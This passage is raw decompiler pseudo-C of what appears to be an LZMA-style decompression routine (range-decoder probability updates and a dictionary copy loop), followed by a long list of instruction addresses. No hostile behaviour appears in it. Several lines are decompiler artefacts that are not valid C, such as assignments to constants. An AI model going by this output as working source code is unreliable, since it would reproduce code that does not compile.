                                                                    								__eflags =  *_t469;
                                                                    								 *(__ebp - 0x30) = 0x10;
                                                                    								 *(__ebp - 0x40) = 8;
                                                                    								L144:
                                                                    								 *(__ebp - 0x7c) = 0x14;
                                                                    								goto L145;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x4c);
                                                                    							__ecx =  *(__ebp - 0x58);
                                                                    							__eax =  *(__ebp - 0x4c) << 4;
                                                                    							 *(__ebp - 0x30) = 8;
                                                                    							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                    							L130:
                                                                    							 *(__ebp - 0x58) = __eax;
                                                                    							 *(__ebp - 0x40) = 3;
                                                                    							goto L144;
                                                                    						case 0x14:
                                                                    							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                    							__eax =  *(__ebp - 0x80);
                                                                    							goto L140;
                                                                    						case 0x15:
                                                                    							__eax = 0;
                                                                    							__eflags =  *(__ebp - 0x38) - 7;
                                                                    							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                    							__al = __al & 0x000000fd;
                                                                    							__eax = (__eflags >= 0) - 1 + 0xb;
                                                                    							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                    							goto L120;
                                                                    						case 0x16:
                                                                    							__eax =  *(__ebp - 0x30);
                                                                    							__eflags = __eax - 4;
                                                                    							if(__eax >= 4) {
                                                                    								_push(3);
                                                                    								_pop(__eax);
                                                                    							}
                                                                    							__ecx =  *(__ebp - 4);
                                                                    							 *(__ebp - 0x40) = 6;
                                                                    							__eax = __eax << 7;
                                                                    							 *(__ebp - 0x7c) = 0x19;
                                                                    							 *(__ebp - 0x58) = __eax;
                                                                    							goto L145;
                                                                    						case 0x17:
                                                                    							L145:
                                                                    							__eax =  *(__ebp - 0x40);
                                                                    							 *(__ebp - 0x50) = 1;
                                                                    							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                    							goto L149;
                                                                    						case 0x18:
                                                                    							L146:
                                                                    							__eflags =  *(__ebp - 0x6c);
                                                                    							if( *(__ebp - 0x6c) == 0) {
                                                                    								 *(__ebp - 0x88) = 0x18;
                                                                    								goto L170;
                                                                    							}
                                                                    							__ecx =  *(__ebp - 0x70);
                                                                    							__eax =  *(__ebp - 0xc);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                    							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                    							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							_t484 = __ebp - 0x70;
                                                                    							 *_t484 =  *(__ebp - 0x70) + 1;
                                                                    							__eflags =  *_t484;
                                                                    							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                    							L148:
                                                                    							_t487 = __ebp - 0x48;
                                                                    							 *_t487 =  *(__ebp - 0x48) - 1;
                                                                    							__eflags =  *_t487;
                                                                    							L149:
                                                                    							__eflags =  *(__ebp - 0x48);
                                                                    							if( *(__ebp - 0x48) <= 0) {
                                                                    								__ecx =  *(__ebp - 0x40);
                                                                    								__ebx =  *(__ebp - 0x50);
                                                                    								0 = 1;
                                                                    								__eax = 1 << __cl;
                                                                    								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                    								__eax =  *(__ebp - 0x7c);
                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                    								goto L140;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x50);
                                                                    							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    							__eax =  *(__ebp - 0x58);
                                                                    							__esi = __edx + __eax;
                                                                    							 *(__ebp - 0x54) = __esi;
                                                                    							__ax =  *__esi;
                                                                    							__edi = __ax & 0x0000ffff;
                                                                    							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                    							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                    							if( *(__ebp - 0xc) >= __ecx) {
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                    								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                    								__cx = __ax;
                                                                    								__cx = __ax >> 5;
                                                                    								__eax = __eax - __ecx;
                                                                    								__edx = __edx + 1;
                                                                    								__eflags = __edx;
                                                                    								 *__esi = __ax;
                                                                    								 *(__ebp - 0x50) = __edx;
                                                                    							} else {
                                                                    								 *(__ebp - 0x10) = __ecx;
                                                                    								0x800 = 0x800 - __edi;
                                                                    								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                    								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    								 *__esi = __cx;
                                                                    							}
                                                                    							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    								goto L148;
                                                                    							} else {
                                                                    								goto L146;
                                                                    							}
                                                                    						case 0x19:
                                                                    							__eflags = __ebx - 4;
                                                                    							if(__ebx < 4) {
                                                                    								 *(__ebp - 0x2c) = __ebx;
                                                                    								L119:
                                                                    								_t393 = __ebp - 0x2c;
                                                                    								 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                    								__eflags =  *_t393;
                                                                    								L120:
                                                                    								__eax =  *(__ebp - 0x2c);
                                                                    								__eflags = __eax;
                                                                    								if(__eax == 0) {
                                                                    									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                    									goto L170;
                                                                    								}
                                                                    								__eflags = __eax -  *(__ebp - 0x60);
                                                                    								if(__eax >  *(__ebp - 0x60)) {
                                                                    									goto L171;
                                                                    								}
                                                                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                    								__eax =  *(__ebp - 0x30);
                                                                    								_t400 = __ebp - 0x60;
                                                                    								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                    								__eflags =  *_t400;
                                                                    								goto L123;
                                                                    							}
                                                                    							__ecx = __ebx;
                                                                    							__eax = __ebx;
                                                                    							__ecx = __ebx >> 1;
                                                                    							__eax = __ebx & 0x00000001;
                                                                    							__ecx = (__ebx >> 1) - 1;
                                                                    							__al = __al | 0x00000002;
                                                                    							__eax = (__ebx & 0x00000001) << __cl;
                                                                    							__eflags = __ebx - 0xe;
                                                                    							 *(__ebp - 0x2c) = __eax;
                                                                    							if(__ebx >= 0xe) {
                                                                    								__ebx = 0;
                                                                    								 *(__ebp - 0x48) = __ecx;
                                                                    								L102:
                                                                    								__eflags =  *(__ebp - 0x48);
                                                                    								if( *(__ebp - 0x48) <= 0) {
                                                                    									__eax = __eax + __ebx;
                                                                    									 *(__ebp - 0x40) = 4;
                                                                    									 *(__ebp - 0x2c) = __eax;
                                                                    									__eax =  *(__ebp - 4);
                                                                    									__eax =  *(__ebp - 4) + 0x644;
                                                                    									__eflags = __eax;
                                                                    									L108:
                                                                    									__ebx = 0;
                                                                    									 *(__ebp - 0x58) = __eax;
                                                                    									 *(__ebp - 0x50) = 1;
                                                                    									 *(__ebp - 0x44) = 0;
                                                                    									 *(__ebp - 0x48) = 0;
                                                                    									L112:
                                                                    									__eax =  *(__ebp - 0x40);
                                                                    									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                    									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                    										_t391 = __ebp - 0x2c;
                                                                    										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                    										__eflags =  *_t391;
                                                                    										goto L119;
                                                                    									}
                                                                    									__eax =  *(__ebp - 0x50);
                                                                    									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                    									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                    									__eax =  *(__ebp - 0x58);
                                                                    									__esi = __edi + __eax;
                                                                    									 *(__ebp - 0x54) = __esi;
                                                                    									__ax =  *__esi;
                                                                    									__ecx = __ax & 0x0000ffff;
                                                                    									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                    									__eflags =  *(__ebp - 0xc) - __edx;
                                                                    									if( *(__ebp - 0xc) >= __edx) {
                                                                    										__ecx = 0;
                                                                    										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                    										__ecx = 1;
                                                                    										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                    										__ebx = 1;
                                                                    										__ecx =  *(__ebp - 0x48);
                                                                    										__ebx = 1 << __cl;
                                                                    										__ecx = 1 << __cl;
                                                                    										__ebx =  *(__ebp - 0x44);
                                                                    										__ebx =  *(__ebp - 0x44) | __ecx;
                                                                    										__cx = __ax;
                                                                    										__cx = __ax >> 5;
                                                                    										__eax = __eax - __ecx;
                                                                    										__edi = __edi + 1;
                                                                    										__eflags = __edi;
                                                                    										 *(__ebp - 0x44) = __ebx;
                                                                    										 *__esi = __ax;
                                                                    										 *(__ebp - 0x50) = __edi;
                                                                    									} else {
                                                                    										 *(__ebp - 0x10) = __edx;
                                                                    										0x800 = 0x800 - __ecx;
                                                                    										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                    										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                    										 *__esi = __dx;
                                                                    									}
                                                                    									__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    									if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    										L111:
                                                                    										_t368 = __ebp - 0x48;
                                                                    										 *_t368 =  *(__ebp - 0x48) + 1;
                                                                    										__eflags =  *_t368;
                                                                    										goto L112;
                                                                    									} else {
                                                                    										goto L109;
                                                                    									}
                                                                    								}
                                                                    								__ecx =  *(__ebp - 0xc);
                                                                    								__ebx = __ebx + __ebx;
                                                                    								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                    								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                    								 *(__ebp - 0x44) = __ebx;
                                                                    								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                    									__ecx =  *(__ebp - 0x10);
                                                                    									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                    									__ebx = __ebx | 0x00000001;
                                                                    									__eflags = __ebx;
                                                                    									 *(__ebp - 0x44) = __ebx;
                                                                    								}
                                                                    								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                    								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                    									L101:
                                                                    									_t338 = __ebp - 0x48;
                                                                    									 *_t338 =  *(__ebp - 0x48) - 1;
                                                                    									__eflags =  *_t338;
                                                                    									goto L102;
                                                                    								} else {
                                                                    									goto L99;
                                                                    								}
                                                                    							}
                                                                    							__edx =  *(__ebp - 4);
                                                                    							__eax = __eax - __ebx;
                                                                    							 *(__ebp - 0x40) = __ecx;
                                                                    							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                    							goto L108;
                                                                    						case 0x1a:
                                                                    							goto L55;
                                                                    						case 0x1b:
                                                                    							L75:
                                                                    							__eflags =  *(__ebp - 0x64);
                                                                    							if( *(__ebp - 0x64) == 0) {
                                                                    								 *(__ebp - 0x88) = 0x1b;
                                                                    								goto L170;
                                                                    							}
                                                                    							__eax =  *(__ebp - 0x14);
                                                                    							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    							__eflags = __eax -  *(__ebp - 0x74);
                                                                    							if(__eax >=  *(__ebp - 0x74)) {
                                                                    								__eax = __eax +  *(__ebp - 0x74);
                                                                    								__eflags = __eax;
                                                                    							}
                                                                    							__edx =  *(__ebp - 8);
                                                                    							__cl =  *(__eax + __edx);
                                                                    							__eax =  *(__ebp - 0x14);
                                                                    							 *(__ebp - 0x5c) = __cl;
                                                                    							 *(__eax + __edx) = __cl;
                                                                    							__eax = __eax + 1;
                                                                    							__edx = 0;
                                                                    							_t274 = __eax %  *(__ebp - 0x74);
                                                                    							__eax = __eax /  *(__ebp - 0x74);
                                                                    							__edx = _t274;
                                                                    							__eax =  *(__ebp - 0x68);
                                                                    							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                    							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    							_t283 = __ebp - 0x64;
                                                                    							 *_t283 =  *(__ebp - 0x64) - 1;
                                                                    							__eflags =  *_t283;
                                                                    							 *( *(__ebp - 0x68)) = __cl;
                                                                    							goto L79;
                                                                    						case 0x1c:
                                                                    							while(1) {
                                                                    								L123:
                                                                    								__eflags =  *(__ebp - 0x64);
                                                                    								if( *(__ebp - 0x64) == 0) {
                                                                    									break;
                                                                    								}
                                                                    								__eax =  *(__ebp - 0x14);
                                                                    								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                    								__eflags = __eax -  *(__ebp - 0x74);
                                                                    								if(__eax >=  *(__ebp - 0x74)) {
                                                                    									__eax = __eax +  *(__ebp - 0x74);
                                                                    									__eflags = __eax;
                                                                    								}
                                                                    								__edx =  *(__ebp - 8);
                                                                    								__cl =  *(__eax + __edx);
                                                                    								__eax =  *(__ebp - 0x14);
                                                                    								 *(__ebp - 0x5c) = __cl;
                                                                    								 *(__eax + __edx) = __cl;
                                                                    								__eax = __eax + 1;
                                                                    								__edx = 0;
                                                                    								_t414 = __eax %  *(__ebp - 0x74);
                                                                    								__eax = __eax /  *(__ebp - 0x74);
                                                                    								__edx = _t414;
                                                                    								__eax =  *(__ebp - 0x68);
                                                                    								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                    								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                    								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                    								__eflags =  *(__ebp - 0x30);
                                                                    								 *( *(__ebp - 0x68)) = __cl;
                                                                    								 *(__ebp - 0x14) = __edx;
                                                                    								if( *(__ebp - 0x30) > 0) {
                                                                    									continue;
                                                                    								} else {
                                                                    									goto L80;
                                                                    								}
                                                                    							}
                                                                    							 *(__ebp - 0x88) = 0x1c;
                                                                    							goto L170;
                                                                    					}
                                                                    				}
                                                                    			}













                                                                    0x00000000
                                                                    0x00406d5f
                                                                    0x00406d5f
                                                                    0x00406d64
                                                                    0x00406ddb
                                                                    0x00406de2
                                                                    0x00406dec
                                                                    0x004073cb
                                                                    0x004073cb
                                                                    0x004073ce
                                                                    0x004073ce
                                                                    0x004073d4
                                                                    0x004073da
                                                                    0x004073e0
                                                                    0x004073fa
                                                                    0x004073fd
                                                                    0x00407403
                                                                    0x0040740e
                                                                    0x00407410
                                                                    0x004073e2
                                                                    0x004073e2
                                                                    0x004073f1
                                                                    0x004073f5
                                                                    0x004073f5
                                                                    0x0040741a
                                                                    0x00407441
                                                                    0x00407441
                                                                    0x00407447
                                                                    0x00407447
                                                                    0x00000000
                                                                    0x0040741c
                                                                    0x0040741c
                                                                    0x00407420
                                                                    0x004075cf
                                                                    0x00000000
                                                                    0x004075cf
                                                                    0x0040742c
                                                                    0x00407433
                                                                    0x0040743b
                                                                    0x0040743e
                                                                    0x00000000
                                                                    0x0040743e
                                                                    0x00406d66
                                                                    0x00406d66
                                                                    0x00406d6a
                                                                    0x00406d72
                                                                    0x00406d75
                                                                    0x00406d77
                                                                    0x00406d7a
                                                                    0x00406d7c
                                                                    0x00406d81
                                                                    0x00406d84
                                                                    0x00406d8b
                                                                    0x00406d92
                                                                    0x00406d95
                                                                    0x00406da0
                                                                    0x00406da8
                                                                    0x00406da8
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406da2
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406d97
                                                                    0x00406daf
                                                                    0x00406dcd
                                                                    0x00406dcf
                                                                    0x00406fa2
                                                                    0x00406fa2
                                                                    0x00406fa5
                                                                    0x00406fa8
                                                                    0x00406fab
                                                                    0x00406fae
                                                                    0x00406fb1
                                                                    0x00406fb4
                                                                    0x00406fb7
                                                                    0x00406fba
                                                                    0x00406fc0
                                                                    0x00406fd8
                                                                    0x00406fdb
                                                                    0x00406fde
                                                                    0x00406fe1
                                                                    0x00406fe1
                                                                    0x00406fe4
                                                                    0x00406fea
                                                                    0x00406fc2
                                                                    0x00406fc2
                                                                    0x00406fca
                                                                    0x00406fcf
                                                                    0x00406fd1
                                                                    0x00406fd3
                                                                    0x00406fd3
                                                                    0x00406ff4
                                                                    0x00406ff7
                                                                    0x00406f9a
                                                                    0x00406fa0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ff9
                                                                    0x00406f75
                                                                    0x00406f79
                                                                    0x00407581
                                                                    0x00000000
                                                                    0x00407581
                                                                    0x00406f7f
                                                                    0x00406f82
                                                                    0x00406f85
                                                                    0x00406f89
                                                                    0x00406f8c
                                                                    0x00406f92
                                                                    0x00406f94
                                                                    0x00406f94
                                                                    0x00406f97
                                                                    0x00000000
                                                                    0x00406f97
                                                                    0x00406db1
                                                                    0x00406db1
                                                                    0x00406db4
                                                                    0x00406dba
                                                                    0x00406dbc
                                                                    0x00406dbc
                                                                    0x00406dbf
                                                                    0x00406dc2
                                                                    0x00406dc4
                                                                    0x00406dc5
                                                                    0x00406dc8
                                                                    0x00406e35
                                                                    0x00406e35
                                                                    0x00406e39
                                                                    0x00406e3c
                                                                    0x00406e3f
                                                                    0x00406e42
                                                                    0x00406e45
                                                                    0x00406e46
                                                                    0x00406e49
                                                                    0x00406e4b
                                                                    0x00406e51
                                                                    0x00406e54
                                                                    0x00406e57
                                                                    0x00406e5a
                                                                    0x00406e5d
                                                                    0x00406e63
                                                                    0x00406e7f
                                                                    0x00406e82
                                                                    0x00406e85
                                                                    0x00406e88
                                                                    0x00406e8f
                                                                    0x00406e95
                                                                    0x00406e99
                                                                    0x00406e65
                                                                    0x00406e65
                                                                    0x00406e69
                                                                    0x00406e71
                                                                    0x00406e76
                                                                    0x00406e78
                                                                    0x00406e7a
                                                                    0x00406e7a
                                                                    0x00406ea3
                                                                    0x00406ea6
                                                                    0x00406e1d
                                                                    0x00406e1d
                                                                    0x00406e23
                                                                    0x00406ed6
                                                                    0x00406edc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ede
                                                                    0x00406ee1
                                                                    0x00406ee4
                                                                    0x00406ee7
                                                                    0x00406eea
                                                                    0x00406eed
                                                                    0x00406ef0
                                                                    0x00406ef3
                                                                    0x00406ef6
                                                                    0x00406efc
                                                                    0x00406f14
                                                                    0x00406f17
                                                                    0x00406f1a
                                                                    0x00406f1d
                                                                    0x00406f1d
                                                                    0x00406f20
                                                                    0x00406f26
                                                                    0x00406efe
                                                                    0x00406efe
                                                                    0x00406f06
                                                                    0x00406f0b
                                                                    0x00406f0d
                                                                    0x00406f0f
                                                                    0x00406f0f
                                                                    0x00406f30
                                                                    0x00406f33
                                                                    0x00406eb1
                                                                    0x00406eb5
                                                                    0x00407575
                                                                    0x00000000
                                                                    0x00407575
                                                                    0x00406ebb
                                                                    0x00406ebe
                                                                    0x00406ec1
                                                                    0x00406ec5
                                                                    0x00406ec8
                                                                    0x00406ece
                                                                    0x00406ed0
                                                                    0x00406ed0
                                                                    0x00406ed3
                                                                    0x00406ed3
                                                                    0x00406f33
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3a
                                                                    0x00406f3e
                                                                    0x00406f3e
                                                                    0x00406f41
                                                                    0x00406f44
                                                                    0x00406f48
                                                                    0x0040758d
                                                                    0x00000000
                                                                    0x0040758d
                                                                    0x00406f4e
                                                                    0x00406f51
                                                                    0x00406f54
                                                                    0x00406f57
                                                                    0x00406f5a
                                                                    0x00406f5d
                                                                    0x00406f60
                                                                    0x00406f62
                                                                    0x00406f65
                                                                    0x00406f68
                                                                    0x00406f6b
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x00406f6d
                                                                    0x0040710a
                                                                    0x0040710a
                                                                    0x0040710d
                                                                    0x0040710d
                                                                    0x00000000
                                                                    0x0040710d
                                                                    0x00406e2f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406eac
                                                                    0x00406df8
                                                                    0x00406dfc
                                                                    0x00407569
                                                                    0x004075e5
                                                                    0x004075ed
                                                                    0x004075f4
                                                                    0x004075f6
                                                                    0x004075fd
                                                                    0x00407601
                                                                    0x00407601
                                                                    0x00406e02
                                                                    0x00406e05
                                                                    0x00406e08
                                                                    0x00406e0c
                                                                    0x00406e0f
                                                                    0x00406e15
                                                                    0x00406e17
                                                                    0x00406e17
                                                                    0x00406e1a
                                                                    0x00000000
                                                                    0x00406e1a
                                                                    0x00406ea6
                                                                    0x00406daf
                                                                    0x00406be3
                                                                    0x00406be3
                                                                    0x00406bec
                                                                    0x004075fa
                                                                    0x004075fa
                                                                    0x00000000
                                                                    0x004075fa
                                                                    0x00406bf2
                                                                    0x00000000
                                                                    0x00406bfd
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c06
                                                                    0x00406c09
                                                                    0x00406c0c
                                                                    0x00406c10
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c16
                                                                    0x00406c19
                                                                    0x00406c1b
                                                                    0x00406c1c
                                                                    0x00406c1f
                                                                    0x00406c21
                                                                    0x00406c22
                                                                    0x00406c24
                                                                    0x00406c27
                                                                    0x00406c2c
                                                                    0x00406c31
                                                                    0x00406c3a
                                                                    0x00406c4d
                                                                    0x00406c50
                                                                    0x00406c5c
                                                                    0x00406c84
                                                                    0x00406c86
                                                                    0x00406c94
                                                                    0x00406c94
                                                                    0x00406c98
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c88
                                                                    0x00406c8b
                                                                    0x00406c8c
                                                                    0x00406c8c
                                                                    0x00000000
                                                                    0x00406c88
                                                                    0x00406c62
                                                                    0x00406c67
                                                                    0x00406c67
                                                                    0x00406c70
                                                                    0x00406c78
                                                                    0x00406c7b
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c81
                                                                    0x00000000
                                                                    0x00406c9e
                                                                    0x00406c9e
                                                                    0x00406ca2
                                                                    0x0040754e
                                                                    0x00000000
                                                                    0x0040754e
                                                                    0x00406cab
                                                                    0x00406cbb
                                                                    0x00406cbe
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc1
                                                                    0x00406cc4
                                                                    0x00406cc8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406cca
                                                                    0x00406cd0
                                                                    0x00406cfa
                                                                    0x00406d00
                                                                    0x00406d07
                                                                    0x00000000
                                                                    0x00406d07
                                                                    0x00406cd6
                                                                    0x00406cd9
                                                                    0x00406cde
                                                                    0x00406cde
                                                                    0x00406ce9
                                                                    0x00406cf1
                                                                    0x00406cf4
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d39
                                                                    0x00406d3f
                                                                    0x00406d42
                                                                    0x00406d4f
                                                                    0x00406d57
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406d0e
                                                                    0x00406d0e
                                                                    0x00406d12
                                                                    0x0040755d
                                                                    0x00000000
                                                                    0x0040755d
                                                                    0x00406d1e
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d29
                                                                    0x00406d2c
                                                                    0x00406d2f
                                                                    0x00406d32
                                                                    0x00406d37
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00406ffe
                                                                    0x00407002
                                                                    0x00407020
                                                                    0x00407023
                                                                    0x0040702a
                                                                    0x0040702d
                                                                    0x00407030
                                                                    0x00407033
                                                                    0x00407036
                                                                    0x00407039
                                                                    0x0040703b
                                                                    0x00407042
                                                                    0x00407043
                                                                    0x00407045
                                                                    0x00407048
                                                                    0x0040704b
                                                                    0x0040704e
                                                                    0x0040704e
                                                                    0x00407053
                                                                    0x00000000
                                                                    0x00407053
                                                                    0x00407004
                                                                    0x00407007
                                                                    0x0040700a
                                                                    0x00407014
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407068
                                                                    0x0040706c
                                                                    0x0040708f
                                                                    0x00407092
                                                                    0x00407095
                                                                    0x0040709f
                                                                    0x0040706e
                                                                    0x0040706e
                                                                    0x00407071
                                                                    0x00407074
                                                                    0x00407077
                                                                    0x00407084
                                                                    0x00407087
                                                                    0x00407087
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070ab
                                                                    0x004070af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070b5
                                                                    0x004070b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004070bf
                                                                    0x004070c1
                                                                    0x004070c5
                                                                    0x004070c5
                                                                    0x004070c8
                                                                    0x004070cc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040711c
                                                                    0x00407120
                                                                    0x00407127
                                                                    0x0040712a
                                                                    0x0040712d
                                                                    0x00407137
                                                                    0x00000000
                                                                    0x00407137
                                                                    0x00407122
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407143
                                                                    0x00407147
                                                                    0x0040714e
                                                                    0x00407151
                                                                    0x00407154
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407149
                                                                    0x00407157
                                                                    0x0040715a
                                                                    0x0040715d
                                                                    0x0040715d
                                                                    0x00407160
                                                                    0x00407163
                                                                    0x00407166
                                                                    0x00407166
                                                                    0x00407169
                                                                    0x00407170
                                                                    0x00407175
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407203
                                                                    0x00407203
                                                                    0x00407207
                                                                    0x004075a5
                                                                    0x00000000
                                                                    0x004075a5
                                                                    0x0040720d
                                                                    0x00407210
                                                                    0x00407213
                                                                    0x00407217
                                                                    0x0040721a
                                                                    0x00407220
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407222
                                                                    0x00407225
                                                                    0x00407228
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407286
                                                                    0x00407286
                                                                    0x0040728a
                                                                    0x004075b1
                                                                    0x00000000
                                                                    0x004075b1
                                                                    0x00407290
                                                                    0x00407293
                                                                    0x00407296
                                                                    0x0040729a
                                                                    0x0040729d
                                                                    0x004072a3
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a5
                                                                    0x004072a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407056
                                                                    0x00407056
                                                                    0x00407059
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407395
                                                                    0x00407399
                                                                    0x004073bb
                                                                    0x004073be
                                                                    0x004073c8
                                                                    0x00000000
                                                                    0x004073c8
                                                                    0x0040739b
                                                                    0x0040739e
                                                                    0x004073a2
                                                                    0x004073a5
                                                                    0x004073a5
                                                                    0x004073a8
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407452
                                                                    0x00407456
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x00407474
                                                                    0x0040747b
                                                                    0x00407482
                                                                    0x00407489
                                                                    0x00407489
                                                                    0x00000000
                                                                    0x00407489
                                                                    0x00407458
                                                                    0x0040745b
                                                                    0x0040745e
                                                                    0x00407461
                                                                    0x00407468
                                                                    0x004073ac
                                                                    0x004073ac
                                                                    0x004073af
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407543
                                                                    0x00407546
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040717d
                                                                    0x0040717f
                                                                    0x00407186
                                                                    0x00407187
                                                                    0x00407189
                                                                    0x0040718c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407194
                                                                    0x00407197
                                                                    0x0040719a
                                                                    0x0040719c
                                                                    0x0040719e
                                                                    0x0040719e
                                                                    0x0040719f
                                                                    0x004071a2
                                                                    0x004071a9
                                                                    0x004071ac
                                                                    0x004071ba
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00407490
                                                                    0x00407490
                                                                    0x00407493
                                                                    0x0040749a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040749f
                                                                    0x0040749f
                                                                    0x004074a3
                                                                    0x004075db
                                                                    0x00000000
                                                                    0x004075db
                                                                    0x004074a9
                                                                    0x004074ac
                                                                    0x004074af
                                                                    0x004074b3
                                                                    0x004074b6
                                                                    0x004074bc
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074be
                                                                    0x004074c1
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c4
                                                                    0x004074c7
                                                                    0x004074c7
                                                                    0x004074cb
                                                                    0x0040752b
                                                                    0x0040752e
                                                                    0x00407533
                                                                    0x00407534
                                                                    0x00407536
                                                                    0x00407538
                                                                    0x0040753b
                                                                    0x00000000
                                                                    0x0040753b
                                                                    0x004074cd
                                                                    0x004074d3
                                                                    0x004074d6
                                                                    0x004074d9
                                                                    0x004074dc
                                                                    0x004074df
                                                                    0x004074e2
                                                                    0x004074e5
                                                                    0x004074e8
                                                                    0x004074eb
                                                                    0x004074ee
                                                                    0x00407507
                                                                    0x0040750a
                                                                    0x0040750d
                                                                    0x00407510
                                                                    0x00407514
                                                                    0x00407516
                                                                    0x00407516
                                                                    0x00407517
                                                                    0x0040751a
